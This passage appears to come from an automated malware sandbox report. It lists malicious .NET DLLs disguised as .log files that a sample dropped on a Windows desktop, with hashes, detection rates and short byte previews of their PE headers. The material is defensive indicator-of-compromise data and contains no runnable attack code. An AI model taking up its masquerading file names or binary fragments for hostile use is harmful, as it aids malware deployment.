                                                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\e1642062cdec91

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with very long lines (422), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):422
                                                                                                                          Entropy (8bit):5.848708934998511
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:WWe1To3obK2p6P/qIVbl3ciWou4TW+jM1e5Fv4:WWo+omD4/KK31e5FA
                                                                                                                          MD5:25DDD73375E2B67AA8E35D0A0CBF15F1
                                                                                                                          SHA1:CF7D0A98D158F391C98BC23D28E2BC28B83566BA
                                                                                                                          SHA-256:FCAAD157E26F9FE902E1C58F38A5B71A3E447DF2AFBAB127F767C041565C4962
                                                                                                                          SHA-512:4566C4FC804E33E10CB94917E32AE520AE2320D073C47197B95CB31BE913722FEEF441B4BD24923BE0006FA4D911D480757038381AD41664C4C53915B24FAF68
                                                                                                                          Malicious:false
                                                                                                                          Preview:OiEenewsR5CpEQpmXLgHQUWld72X7Z37e2YXbxSkVmu9OGR3KXmQJGJ4McBpmZu2BFKM2RKj36vokWWWq8MjwmyYtdK9wm86118J6EB2NCXMVeU0Fo9nMLFZRwcYHLxR8zwsYNal7TWuPlDPJT3HmUuqwj1JmmvBOGOfrlc1NYq2zUKptNPxRqonFG5yVR8ViUfJXhhh1B3Oo11bZMZZX7tibkalqnf6ZUUezASMqr6Qwa9NPeZJ1j7kl7rwG61Nf6yTgWmY3NtqBdvAlMVMNWF0Wt32SfGtzsu0mpr21BPnzRiHLrL3kpAJ176wdtFYH90Tt5X5fcULGbAFLvqlUMJJsk8os4ZH61g0bPXPUPXIVyDZ71lrCdE40qlJ6sMlCMOP5Kn5YbQEzAy3hir1SrEdwlAuoOSlCvFJjx

                                                                                                                          C:\Users\user\Desktop\fkPTPiGE.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):39936
                                                                                                                          Entropy (8bit):5.660491370279985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\haYbFIoh.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):342528
                                                                                                                          Entropy (8bit):6.170134230759619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\jaFJWeGx.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34816
                                                                                                                          Entropy (8bit):5.636032516496583
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\mESaxTkZ.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32256
                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\mNqahFDV.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):39936
                                                                                                                          Entropy (8bit):5.629584586954759
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\mTUsIbsw.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40448
                                                                                                                          Entropy (8bit):5.7028690200758465
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\mVZsMoeb.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):46592
                                                                                                                          Entropy (8bit):5.870612048031897
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\oGFJTCoU.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):50176
                                                                                                                          Entropy (8bit):5.723168999026349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\oVHaeKwr.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):50176
                                                                                                                          Entropy (8bit):5.723168999026349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\rrkZaPzN.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):38912
                                                                                                                          Entropy (8bit):5.679286635687991
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\sOCSoUjP.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):39936
                                                                                                                          Entropy (8bit):5.660491370279985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\uOkAGqBf.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):46592
                                                                                                                          Entropy (8bit):5.870612048031897
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\vCoIsDxd.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):85504
                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                          C:\Users\user\Desktop\wBUQRRyD.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):33280
                                                                                                                          Entropy (8bit):5.634433516692816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\yEaqNnCZ.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34304
                                                                                                                          Entropy (8bit):5.618776214605176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\zujzDNjC.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34304
                                                                                                                          Entropy (8bit):5.618776214605176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:MSVC .res
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1224
                                                                                                                          Entropy (8bit):4.435108676655666
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                          Malicious:false
